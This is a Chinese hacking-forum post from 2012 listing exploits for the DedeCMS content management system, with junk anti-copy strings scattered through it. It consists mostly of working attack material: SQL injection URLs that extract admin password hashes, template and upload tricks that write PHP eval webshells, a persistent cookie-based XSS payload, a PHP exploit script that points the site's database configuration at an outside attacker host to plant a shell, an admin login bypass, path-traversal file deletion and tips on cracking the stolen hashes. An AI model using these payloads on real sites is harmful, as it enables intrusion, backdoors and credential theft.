找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3149|回复: 0
打印 上一主题 下一主题

dedecms漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 10:42:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

/ h6 L* Y" s) d  j& @Dedecms 5.6 rss注入漏洞
; E2 q1 e- c" c: R& K
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1' m, M! R2 L$ T  Q7 W: B( k
0 X# G, B4 g! A" A: o6 `9 l  c
" Z" n" V- Q( c4 k3 d  k" x

5 c$ l& V* R( s5 E8 {. f
4 a/ ^* o. p4 ]$ s
$ G6 R: ]- @- o! v3 J" K! B/ P

5 J. y- j4 D2 ^$ y  x* G  {1 n8 ^+ @# a/ R8 M4 s7 a
DedeCms v5.6 嵌入恶意代码执行漏洞+ l3 v6 \% V# b3 A3 }" w
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}: n1 ^) ?" g+ H# N
发表后查看或修改即可执行
5 v' x% k6 U/ I, \; p, M5 X8 Ba{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
# }$ |1 e3 B6 _8 i- g; W生成x.php 密码xiao,直接生成一句话。
% f7 m. _7 Y( p! q$ A  }6 E. P
% r# u5 Q. M; ?! w3 S9 ]# L; y! C* j3 X

4 ~9 ^( ?0 ?6 ~  \5 e2 y/ r: b, k( \' e: @

9 j) E9 L1 [/ d+ x2 [0 l* |" j
$ K; _# O' {. S/ u: E( c7 c: Y+ `% Z# Z+ c- z

; r8 y& e7 X! ], h9 ]1 T- T* Q6 aDede 5.6 GBK SQL注入漏洞
- E9 |! c" S8 u
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
  u5 n+ A3 L2 m; K3 X/ P7 u' e$ ^" z' A
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
! J' G- y' p1 K0 m4 Z8 O; D% Vhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
3 N" h, N/ }. K. O0 B7 x
# U. M% j3 J4 W3 f" c
/ i& V; m$ M1 X. [, q
- u: _* v! ?4 |. H+ F1 j0 ]0 r% c3 M# O0 G9 ~! O9 S' c
; E! y. d! P+ A. E& q: g9 ]( M

$ j3 J4 N: X2 |4 H+ k2 d! x( W2 w$ G. e' y5 A7 O- D- x
7 P! `  d& `" {/ W: Z
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞: \. N/ S) [2 J  g6 U
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` ; p" Y1 B( J/ R4 V3 T
; F$ U) m8 Z% ^0 o' ~% P0 D* n5 C
% f* W/ f" W9 w4 d( r* @
9 s+ B% ?" g+ J8 Z0 }2 z3 L
) i- [6 ], A! K- [/ f
7 `. I& V2 X( F% g# \

# X; J; Y4 b# r- |$ m+ o/ qDEDECMS 全版本 gotopage变量XSS漏洞2 ], E6 I9 p' e4 V  i# t! `
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 ) F7 M- k" m/ q) K. ~% O( \
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="/ ~0 R8 L" Z. a( }. J$ E! E' v1 ^

/ |' i# o: R2 M1 O. }
8 ~# N8 o/ e( S7 l7 f8 R$ x2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 5 x: \8 d9 n6 `# m4 q: I) L' S- n
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda  |  \9 G* f7 L1 O$ Z
: T2 t! {0 F" O3 Z$ t

3 _* O( n. N" uhttp://v57.demo.dedecms.com/dede/login.php
2 y0 ^0 i+ I" I- R. t' B9 X
* z7 D+ \: M- j- _# {. L
6 Q( v6 y4 W4 C1 X1 l$ [/ Jcolor=Red]DeDeCMS(织梦)变量覆盖getshell' @) g! W9 Y2 O  I6 K. P' a
#!usr/bin/php -w
( s, [& q- b3 L+ y<?php
6 ^" A& B" ]0 A* terror_reporting(E_ERROR);3 s, b7 m) U8 c% u- ?7 ^
set_time_limit(0);
4 }* K: h3 B$ R! G- t% [% {- _print_r('$ l, O( `/ x. `& f7 e& }; L4 L1 I; p
DEDEcms Variable Coverage! \- l: U+ H  @9 g
Exploit Author:
www.heixiaozi.comwww.webvul.com
2 h$ a% j; t  ^6 v& t);
7 f- h9 i9 ~& Aecho "\r\n";: k2 `9 k* T6 ]4 T5 I9 P
if($argv[2]==null){# a4 W  l7 x. C+ o
print_r('
/ ]* n2 E+ g; a, G+ h6 p! }& X) K( z+---------------------------------------------------------------------------+( T' q" v6 B& L! l
Usage: php '.$argv[0].' url aid path& @; J# n% I; v/ d$ ?1 R( k
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/2 \4 a. v) H1 F  v  G8 B1 G2 r
Example:  `2 ~9 x$ G6 G7 d- m# R% z
php '.$argv[0].'
www.site.com 1 old
/ s0 c+ l: `, g% }, R, V7 p+---------------------------------------------------------------------------+0 ^2 ^+ g  Q2 R0 ?
');3 z% r% ?* G  H; X
exit;. l) U( Y# E* Z: u# R
}* c* d6 D" x1 |
$url=$argv[1];1 j7 v0 M, _6 A7 I( A
$aid=$argv[2];
+ `5 [0 r/ T' Q" O6 w. i. A$path=$argv[3];
& f, w2 P: a- H# @  C- m5 s1 g; N$exp=Getshell($url,$aid,$path);  o. g/ ^6 y# G& O" F$ o
if (strpos($exp,"OK")>12){
! @7 r/ o3 d/ [echo "
; }$ ^3 Y% M) i$ t- r# zExploit Success \n";6 l" U0 Y4 H) j
if($aid==1)echo "
' a. f4 Y0 E/ b" zShell:".$url."/$path/data/cache/fuck.php\n" ;
, C) `2 k# h( T( ^: _3 |  n. W; {
: p7 h$ J+ M  o7 j, k) \6 ]. }" F' s4 L( z8 R* R5 u
if($aid==2)echo "( |1 L* h: U& E+ {
Shell:".$url."/$path/fuck.php\n" ;9 b0 k! M" ^' F4 q4 ]
6 r, M9 I8 w; u( H

8 B, {: S; T6 f& X! }if($aid==3)echo "
+ g: n3 m& v6 r) R7 m. E' e% t! MShell:".$url."/$path/plus/fuck.php\n";
6 p) N5 p: A3 T1 d5 k5 U1 s5 X5 W% e: ?. v% l& E0 i6 A# _
# K! P3 K& B$ T: X
}else{
+ B0 o" m5 i+ z( [6 yecho "9 c, N% q' t. c! _* ~- l
Exploit Failed \n";! Z5 C& o, x" \% j/ }
}
. u( ]4 @5 w: u# ~function Getshell($url,$aid,$path){
- ?( Z5 z* w9 ?7 v$ T1 L$id=$aid;
/ K5 e0 a& w# z' D/ |$ ^$host=$url;1 Q: Q5 {+ T. K1 E1 i' L
$port="80";6 W0 F: ], {) _9 {9 l9 ^
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
& O! W! F8 }( x6 k- w! _$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
8 b$ f, N5 T8 E, P$data .= "Host: ".$host."\r\n";5 O4 l8 S- W& S/ v
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
/ w: w" `$ D( U- F- b: E  R$ e' e$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";; Z7 V! p( k/ x. |0 p
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";/ e( E: u) K6 U
//$data .= "Accept-Encoding: gzip,deflate\r\n";( @# f% C8 a6 b1 t0 h4 A4 [2 l  Q
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";7 s& w+ A9 [- K  v: @+ W# c
$data .= "Connection: keep-alive\r\n";2 L2 `' T; f: M- _
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";& d' ?8 n; V" `, N+ v; ]1 }5 [
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";3 A) C4 l3 \" t" g) S1 p
$data .= $content."\r\n";
( E* {* W5 ?% t# M  ~( X  [+ n$ock=fsockopen($host,$port);& b" \+ f7 u4 f5 T
if (!$ock) {
, \. c/ x+ }0 w& }( B1 v9 Vecho "/ c8 K' C7 o% {: Y9 F
No response from ".$host."\n";
" w. o1 a! Q( K9 r. W/ H( A. G}, j4 F, l6 ]  K8 u( a
fwrite($ock,$data);+ f% h# B1 w0 W5 j7 t, Z0 U2 w) m
while (!feof($ock)) {
  ?/ ^+ N4 d7 E/ d7 R$exp=fgets($ock, 1024);
' i8 F% c/ e4 e- O6 X# z# l) greturn $exp;8 A0 S# S2 r) L
}
3 U( {; X) v+ }! s- o}
) `& k% ~+ p/ \0 U" x1 i" d$ ]4 Q4 ^. x6 K

$ i7 m/ _3 ?7 z: k- Q" f: d" p?>
- }$ V( s  ~- U4 X# G5 c7 a; I0 f5 B0 u& ?6 B
9 ^  |& d8 j" S) y

  K4 e8 Q! v# n' i' @
9 H4 v! v8 a2 L$ n6 x: I$ d6 L+ i! k* p- a/ {

. A- |8 @  y$ G/ G% q4 U. q% z& G- l$ z* o6 V
$ F, H7 T$ t$ f9 g, c) `  O
: o/ e- p" [2 h9 a! R3 C- @
& M1 f) e- e( S3 d" A. v, v* H
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)0 W  R, V: h- L: N2 T' _
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
, e" \7 r; `/ N2 `$ T
& W5 d0 v9 p2 ~  v) y) z  r- [" E
把上面validate=dcug改为当前的验证码,即可直接进入网站后台6 k! W3 F& v; [% V5 Y( n+ R* ^+ V

2 H1 j* }1 z$ |4 [; Q9 v
& x8 O! V" ^8 R/ T8 @/ u此漏洞的前提是必须得到后台路径才能实现% V) Q; \4 F6 k$ t8 l4 R

" G) V' s' ^/ c; N8 n' l) N% L. x! i/ A) U4 l( {- o9 d
6 ^5 @+ d- A9 W/ d

3 z1 s/ J7 [" Q' F$ h5 z/ S8 `9 o9 s* W8 d2 X) \( m+ D+ q

9 q( ?* T* e2 p; \4 R4 _: M( P, `
5 P' T. Y8 ~9 i& W6 V
7 W* k9 `- n( f! V$ ^" \# y! C" w2 U# q: N$ r% s
& O7 H, t" T; E
Dedecms织梦 标签远程文件写入漏洞
8 V1 o3 C) n2 w; f+ F前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');4 S* n2 |% F+ o& V

5 R: Q" P! W' W1 U5 J6 q) C+ H2 O' t0 j* S
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 . ]: f  _' ?* @9 l( ~& V6 E2 k
<form action="" method="post" name="QuickSearch" id="QuickSearch">
: ~8 Q* k9 e) l3 F<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />6 i% T2 H/ W9 T; o8 v
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />4 T/ F! W$ m! z3 p
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
: s1 ^: b! {" \6 s' y; [# v- x- F<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />" w# `4 }$ J- X2 P
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />* p( u/ l& O; |6 r, O- }
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
* ?' a, X% i+ c<input type="text" value="true" name="nocache" style="width:400">
+ s! t' b: Q7 ]% Z4 E1 B7 f) S<input type="submit" value="提交" name="QuickSearchBtn"><br />7 r% v  \* m7 y2 ~6 [4 {4 J% e4 B0 T& v
</form>
, G- x  M* G4 y7 H$ [& q8 i<script>
, e" W& p4 y2 m0 ]4 U7 ifunction addaction()
- Y0 g- `4 H: F" w{* p+ l+ A- S$ m4 L
document.QuickSearch.action=document.QuickSearch.doaction.value;
3 I/ s+ S8 }) X% c3 j" d}
3 w. E2 S" F: N3 ]! x, t: L3 z</script>/ S" P7 i+ ^8 W/ `1 Z3 w

4 m; _5 J% S9 ]: m$ J$ N
+ U( _# J& r& A/ s  }& b5 A! ~' ?+ D3 i, M

- H1 p1 S& b1 b. W4 p( E% p: M8 H8 a4 x' X; N

+ m; w0 F- t) G5 t" r* _2 R: ?
/ G) D& ^1 }# @" f
! N$ E3 Q4 g" C/ S1 T; a5 h
  P/ S6 {1 {) E
: T% w- G! d3 V3 ^1 UDedeCms v5.6 嵌入恶意代码执行漏洞
# G/ I! Y+ T9 ~& N+ n注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行  o9 E" @# @  c8 V  j8 K% ^
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
( w' r. @5 ]3 T+ G$ w生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
' C4 @" t, Q- c# I1 M3 X% f! V0 e9 WDedecms <= V5.6 Final模板执行漏洞
$ I% w9 Q. s5 u! \注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:% b. o% ^4 {. t) E( _
uploads/userup/2/12OMX04-15A.jpg
2 P7 B# X0 }: j# k6 A7 H* M7 h; [, Q  A8 N
! D3 n& A" {" W9 G
模板内容是(如果限制图片格式,加gif89a):. m7 x1 S  l8 G1 Z# B$ C
{dede:name runphp='yes'}
/ x7 }" f4 x. Q. ?0 e+ A- Y/ F* r$fp = @fopen("1.php", 'a');
$ R6 Y5 S9 W% w/ k7 S3 }@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
" p, O7 h4 U+ j/ S; m- d0 J5 X/ t7 X@fclose($fp);4 b: z$ R0 }( X$ c9 v3 ?6 ^
{/dede:name}
& v' V% w' m5 d# z6 Y: B9 l4 `& W: a: ?9 v2 修改刚刚发表的文章,查看源文件,构造一个表单:
; e# [! Q4 a7 w' I. b( h* s<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
/ Q8 G. K& B4 P( {<input type="hidden" name="dopost" value="save" />
! E; [9 O) ^9 h$ q: P. ]$ \<input type="hidden" name="aid" value="2" />
0 u( `0 r' a+ \# D+ d<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
7 S3 ^- p" W( g* a<input type="hidden" name="channelid" value="1" />8 l* a9 |% H8 {, H
<input type="hidden" name="oldlitpic" value="" />
- I, t! `3 ^+ d0 P. k<input type="hidden" name="sortrank" value="1275972263" />+ Z+ A$ p8 l& b1 G: p/ F5 s3 t% V

. E* k6 t6 D. @# i: ?
* E4 |- b/ p, k; Z9 D! d5 v<div id="mainCp">
2 ^7 j2 B- n1 m4 t<h3 class="meTitle"><strong>修改文章</strong></h3>
  V: |% H' p7 |# o
8 y$ @) W6 m& G* v+ ?2 B% y
' P5 \* f' V2 q; {# J+ P<div class="postForm">& Z& U$ f& X% z4 c) Y6 n% }1 z. v7 U
<label>标题:</label>
, K  P8 V: H. Q9 B+ [9 x1 y  M5 l<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>+ s  B7 _, C  J% [$ `
/ }) w/ R( L8 F9 P' u0 w# @5 E2 s% Z

" O5 m. Y( U7 m3 \5 l2 F<label>标签TAG:</label>3 A0 o7 |8 |* T  c& S/ D. c# ]  o  F& k
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)& W3 Q0 Y0 a6 x' L  E5 }
/ H: J6 p) k, G& G0 G" ]5 K9 w% p- M
  e. p$ V5 B# S9 }9 s- |
<label>作者:</label>
3 N# j9 K3 x; Q% t<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>. a/ j. C, n/ J7 ]1 D1 W4 M' a0 H0 q& W
" X8 g6 R8 z! u
9 E% U: ~" q; z' d2 A5 S! f& B
<label>隶属栏目:</label>
! o6 k/ {, g- i5 R, g<select name='typeid' size='1'>
  C4 u; ^0 H( Q; M2 [<option value='1' class='option3' selected=''>测试栏目</option>
$ x+ W# s  c' M* V</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
$ \) H8 I1 w6 d: h+ K) n# }6 X* o: p1 P: q. }. q

3 H1 x5 h9 r+ X  p<label>我的分类:</label>
0 C7 d5 k7 L1 w' L<select name='mtypesid' size='1'>8 c( J. C+ F* u- S' a
<option value='0' selected>请选择分类...</option>
" Y- b9 |3 w) h$ T9 t5 w& |5 ^0 V<option value='1' class='option3' selected>hahahha</option>
# n1 w- x" K$ M, c* Z- R: v4 R</select>: @8 a) O5 ?8 x

! Y/ D+ o" l9 J1 I$ e. k8 R, U* J$ {" y( j7 R$ B* D
<label>信息摘要:</label>
1 w6 _2 l2 ]0 u% f+ Y<textarea name="description" id="description">1111111</textarea>) W3 ^. O* Y9 p& K6 T
(内容的简要说明)2 H, V: a) N7 u2 z6 H& a: h# d7 n
4 Q$ Q6 {% p, {  W( x
. G/ {5 G% q9 m" q4 U3 c; Y
<label>缩略图:</label>
1 k: Q' t  z) x  D" E<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>9 Q! Q8 a" S9 E% D

! l' w# Q" h+ w( d' Y- [7 D2 g8 x
. ^' x! o# B" p" q/ Z$ X  b<input type='text' name='templet'8 ~- _" a6 c6 j& u
value="../ uploads/userup/2/12OMX04-15A.jpg">) |! L( ?$ B* e" f. R
<input type='text' name='dede_addonfields'
6 n& n. U& G9 h, U! H. O  xvalue="templet,htmltext;">(这里构造); y: Z( o8 L# i0 h
</div>- m7 O8 E+ k# _

; [! o4 X+ L% `6 A. A" W6 F9 I, @4 ?: o+ H# ~2 n  y4 M
<!-- 表单操作区域 -->
1 l0 s" X) _4 H& \<h3 class="meTitle">详细内容</h3>
! b0 y) L. H; N; Y8 x# I
9 t) |% h8 s' Y7 m
2 V% A, {3 ]  }" f- o9 I<div class="contentShow postForm">
% d" Q; d$ R6 q! L" E, t<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
+ ]- l7 y+ s! g7 |& b  F
3 v" \5 b$ t  {' F" T& S1 U$ x
8 j# ]# h  a6 W- p* g/ z<label>验证码:</label>
& z: n! ?! U- [7 M( s<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />) S1 J2 r* F0 ~5 n! S) y
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
* A. T) F' j  i2 d6 k: m# x* j$ [3 f# y( y5 s0 g6 |" t5 m9 o

0 g/ Y1 |9 p0 ]8 |/ w% R* ?7 o! V1 i" L<button class="button2" type="submit">提交</button>+ Q% F% x) K9 C, ]. R/ f9 F5 U
<button class="button2 ml10" type="reset">重置</button>
8 S) l+ C  y7 ]! L' ^& z% ^</div>
: Y  G% a3 W$ M
  W! Z) x8 h6 Z" g9 r
/ D4 i1 c" o$ ]' M+ P</div># h# ~8 t% S6 V/ t

2 }( c" A5 X( l9 A" R0 t! `+ {- f: k9 a2 D  i; Q7 h
</form>* S- b- U$ {9 G& x9 @5 d8 j

0 F$ C) y7 i1 w9 N, W6 \' N9 z4 r9 l' x% M+ W/ {) I: v- \, \
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
* p. Z; J! S& R: p1 Z! G% }! [/ I9 B假设刚刚修改的文章的aid为2,则我们只需要访问:
8 X2 Y4 L5 k- Q
http://127.0.0.1/dede/plus/view.php?aid=2
) G# k2 |) t7 R* g  {" r0 F' I即可以在plus目录下生成webshell:1.php
6 T0 k# o4 ~/ x& j1 N( R8 c2 f2 G- b5 F& R, ^9 w

& h! r$ ^* W* F+ f4 Q' {# U# t9 x4 ], U# f0 h3 J3 t0 p

/ p. m0 v4 b9 B$ Q' I6 ?5 J9 D( ?; ?" w0 k3 x

; I, d! Q  k- K+ r2 O& A. m( h1 w6 R4 _

& ?' e* `. I# \/ \# H: F# N+ X
3 c/ M2 ~9 R: {  L5 G. \# S
" y5 {) v  z8 E* J) U2 C/ N6 m) `- L, o# u

0 W7 S& M, E% h- e2 MDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)" L; Z6 v$ l, {7 \
Gif89a{dede:field name='toby57' runphp='yes'}7 d) m* k) k( x/ @5 l
phpinfo();
( j" @- z; v% Z3 ~" s1 ?{/dede:field}& w2 ?) H6 y$ q3 e$ @6 J
保存为1.gif, B; }9 L9 e$ W  ?
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> ( e+ F5 O9 ^+ c4 ?0 s& |
<input type="hidden" name="aid" value="7" />
- o7 s. P# t5 G<input type="hidden" name="mediatype" value="1" /> , ?) r2 y$ F3 R9 _8 \6 t7 P
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
  Q1 ~. ~/ ~% p7 W4 G, s<input type="hidden" name="dopost" value="save" />
9 \! _3 a: `# X$ l; g4 k<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 6 I7 `2 G! _5 t8 P
<input name="addonfile" type="file" id="addonfile"/>
: c8 m) l# _- |% s% W/ I8 D% z<button class="button2" type="submit" >更改</button> ; c0 n9 K3 a+ [/ v
</form>
  o! a. l* B, _5 n5 q7 Z/ \
* G* i6 B9 J0 `9 m/ D; R( V1 ~4 r, _9 U  S
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif& F- W0 V4 c1 \, I- x# U4 q
发表文章,然后构造修改表单如下:
( r  @6 z9 T$ H& s7 Z' F4 g
7 N8 x# d$ o3 h/ F* N; v8 Z
9 a8 d" ?; L* k& y( x4 h/ `<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
$ h* }9 P$ N* a0 y$ e1 f9 Y<input type="hidden" name="dopost" value="save" /> * a4 e; P3 N! x7 m4 [
<input type="hidden" name="aid" value="2" /> 7 _* k" M- G. X$ D' D6 d" r$ e
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
9 [9 }/ p# Q( R3 s<input type="hidden" name="channelid" value="1" /> 9 ~+ t$ h! ~" ^1 X, @: o+ z  n
<input type="hidden" name="oldlitpic" value="" /> . b  k% u; M/ C& U' j& i: ]
<input type="hidden" name="sortrank" value="1282049150" /> 1 `/ S/ E4 o8 N
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> / d+ ~' |0 [+ A+ @" h
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
4 t. D  T) D; x" M<select name='typeid' size='1'> 7 Z! _2 u7 T% w* D4 c% t3 R
<option value='1' class='option3' selected=''>Test</option> . Q/ |4 _  _4 W# G+ j2 `
<select name='mtypesid' size='1'>
# h  B6 k" h) f7 Y/ s9 I<option value='0' selected>请选择分类...</option> 3 y) B5 q6 [7 `" |
<option value='1' class='option3' selected>aa</option></select> 5 |- i; |3 B: t  @6 m9 A
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> ) O& T4 Z' Y. [* `# d
<input type='hidden' name='dede_addonfields' value="templet"> 1 G+ M2 d/ @' |; N% f4 J6 I% P$ B8 F' F
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
  z1 w8 U& M& p# x( w8 O<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> 3 h# F+ w' R2 u/ Y( l! H9 ]
<button class="button2" type="submit">提交</button> ! U0 I/ N* m& s4 G8 m. D& g
</form>" j! G+ U$ a, u% b
; H- T" s" ~5 H" `0 F2 y5 H7 O! Y
* s# x% t9 k7 q2 N6 ?  r5 X: _: g

% e1 M- j) U8 g3 m2 b1 {
& ^: V% F) t  G9 n, _* F2 S
0 z0 l* S) V: D: f2 l' w9 l  [' S8 ]

0 c6 j7 O8 j# i8 Y# b
3 ^! G5 y1 m' r4 M1 l# |0 j- V6 g2 t7 T: Q- M

9 ~1 N/ h% m% G6 K6 B6 a/ |! Z) |6 e6 O! U

2 t+ k6 g, g$ q/ w1 J6 ^织梦(Dedecms)V5.6 远程文件删除漏洞
9 C# O: R& Z7 T& f9 l5 E. f5 n
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
. S/ p' R# c, W# A4 b9 M& r( x6 D- u( [$ _) F, P

9 Y* o' M% C3 {% J/ `" p1 F2 x* T8 `, K6 @

/ n9 {' M$ e) y5 h9 g
  d1 H" l2 l' b3 I* Q7 e3 p- q6 T
# ^% {( `# g/ W7 v2 r0 \+ R: j% S( y* l5 ?$ o6 [
  M, `7 }1 x" @/ o
3 E5 H3 r9 j. M0 `' t/ F/ U

7 ?/ k" W! p; k织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
) X2 U' f3 o# s$ a4 M! _
http://www.test.com/plus/carbuya ... urn&code=../../4 w; k) J) W% l+ ~
7 i$ w1 a& [4 O0 q( s& t6 S

4 J4 _4 U6 N" {; W% q2 v4 [$ H
! r7 x& [" ?1 T, M% S8 N- u4 E7 G( y, L6 G$ t

: v9 H7 K" ^: i( Y; t" l/ W7 K# }8 W3 T9 x+ o( s( z1 V
6 S0 G- A/ @, s' M5 D
* d. i' l& J- |
  |% C. c. Z+ B, R. Z
, U9 ~2 z/ O( U2 w# m/ n4 W+ U
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
! A" z1 Q6 `- k6 Z6 v1 D% L+ Iplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
9 U4 {' o& U& K2 z. }密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
3 `, v& u8 X: {9 G) S9 u+ l  ?' M2 o, N1 Q
7 K- Z6 @( V: _7 _

7 R+ k) t+ @1 D" u! U: |. o% i8 m; y5 @: s. r
# k) A7 V' {6 E5 X2 R. c& s$ |% M

- x/ G" c/ y2 t( R' u
, c3 _* j7 N6 m' A2 W: @- D) M  H$ d8 U8 v! l% P
1 y- _8 j) z* \: P9 G' ~! ?
9 @! Q3 d+ O5 }7 G
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
